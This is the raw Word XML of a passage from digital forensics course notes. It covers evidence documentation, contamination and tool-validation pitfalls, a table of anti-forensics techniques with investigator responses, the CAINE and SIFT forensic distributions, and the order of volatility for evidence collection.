          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Take photographs and screenshots of important steps and findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Number pages; never erase — cross out and initial corrections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record hash values of every image and exported file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep facts and opinions separate in your notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10 Common Pitfalls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Contamination of evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contamination happens when the original evidence is changed or mixed with other data. Common causes: booting the suspect’s computer normally, connecting a suspect drive to a computer without a write blocker, copying files with ordinary drag-and-drop (which changes access times), installing tools on the suspect system, or using the suspect’s own account. Even simple actions can overwrite deleted data or change timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tool validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A forensic tool must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tested and trusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Investigators should use well-known tools (FTK Imager, Autopsy, EnCase, Volatility), keep them updated, record their version numbers, and verify important findings with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">second tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tools are validated against known test data (such as the NIST CFTT test images) to check that they extract data correctly. An unvalidated tool can give wrong results, and the other party can challenge the evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-forensics awareness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-forensics means techniques used by an offender to hide, destroy or confuse digital evidence. A good investigator knows that “not found” does not always mean “did not happen”.</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658"/>
        <w:gridCol w:w="3544"/>
        <w:gridCol w:w="3544"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Idea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Investigator’s response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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wiping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Overwriting files or free space so they cannot be recovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Look for wiping tool traces (prefetch, registry), check for unusual patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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 clearing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Deleting event logs or bash history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Look for the log-cleared event (e.g. Windows Event ID 1102), compare with other log sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Timestamp tampering (timestomping)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Changing file dates to look old</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Compare with $MFT, $LogFile and other artefacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Encryption / hidden volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Making data unreadable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Capture RAM, look for keys, passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Steganography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Hiding data inside images or audio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Statistical analysis, steganalysis tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Renaming file extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Hiding a file’s true type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Check file signatures (magic bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.11 Forensic Operating Systems — CAINE and SIFT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A normal operating system makes many background changes to the disk it is running on or to disks attached to it. Therefore investigators often use special </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic operating systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be started from a USB or DVD (a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> system) and that avoid automatically changing attached evidence drives. They come with a ready set of forensic tools, so no installation on the suspect system is needed.</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3655"/>
        <w:gridCol w:w="3654"/>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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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CAINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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SIFT Workstation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Full name</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Computer Aided INvestigative Environment</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SANS Investigative Forensic Toolkit</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Based on</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Ubuntu Linux (Italian project)</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Ubuntu Linux (developed by SANS)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Interface</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Graphical, tool menus, with a write-block feature for attached drives</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Mostly command-line tools, available as a VM or installed on Ubuntu</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 included</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Autopsy, The Sleuth Kit, Guymager, Wireshark, and many more</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Sleuth Kit, Plaso/log2timeline, Volatility, bulk_extractor, and many more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Typical use</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Boot a suspect PC safely and image its disk</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Deep analysis of images, memory and timelines</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Remember</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Other forensic distributions (not in your syllabus, but good to know) include Kali Linux forensic mode and Paladin. What matters in the exam: forensic OSes are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">purpose-built Linux systems that let you examine evidence without changing it</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, and CAINE and SIFT are the two examples to name.</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II — Evidence Acquisition &amp; Data Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit I explained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the investigation process is. This unit explains the most delicate part of it — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">acquisition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: how to get data out of a device without damaging it, how to prove the copy is exact, and how to recover data that looks deleted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Volatile vs Non-Volatile Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital data can be divided into two groups depending on whether it survives when power is lost.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Volatile data</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Non-volatile data</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Meaning</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that is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">lost or changes quickly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> when the system is shut down or its state changes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that </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">remains stored</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> even when the system is switched off</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Where</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RAM, CPU cache and registers, network connections, running processes, logged-in users, clipboard</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Hard disk, SSD, USB drives, memory cards, DVDs, log files stored on disk</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Examples of evidence</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Running malware, active attacker connections, decrypted data, passwords typed recently, open command prompts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Documents, deleted files, registry hives, browser history, installed programs, stored logs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Urgency</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Very high — collect first, while the system is still on</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Lower — remains available, but must still be protected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What should be acquired first, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The simple rule is: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">collect the most fragile evidence first.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suppose a computer is infected with malware and is still running. RAM may hold the malicious process, the connection to the attacker’s server, and the attacker’s session. If someone pulls the power plug, all of this vanishes in a moment, and the investigator is left with only the disk. So the live-system data is captured </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> any shutdown or imaging of the disk.</w:t>
      </w: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Principle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The more volatile the evidence, the greater the urgency to preserve it. But the decision to capture live data must also consider authority, risk to the system, and the organisation’s procedures — and every action on a live system must be documented, because it </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> change the system slightly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Order of Volatility</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order of volatility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a ranking of data sources from the one that disappears fastest to the one that lasts longest. Evidence is collected in this order. A commonly taught practical order (as in your syllabus) is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Order of volatility (collect from top to bottom)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E6F2F2" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. RAM (memory) — lost on power-off</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DCEBF5" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Network connections — change or close within seconds</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E6F2F2" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Running processes — can end at any time</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DCEBF5" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Logged-on users and sessions</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E6F2F2" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Open files</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val="false"/>
              <w:pBdr>
                <w:top w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:bottom w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:left w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:right w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
              </w:pBdr>
              <w:shd w:fill="DCEBF5" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
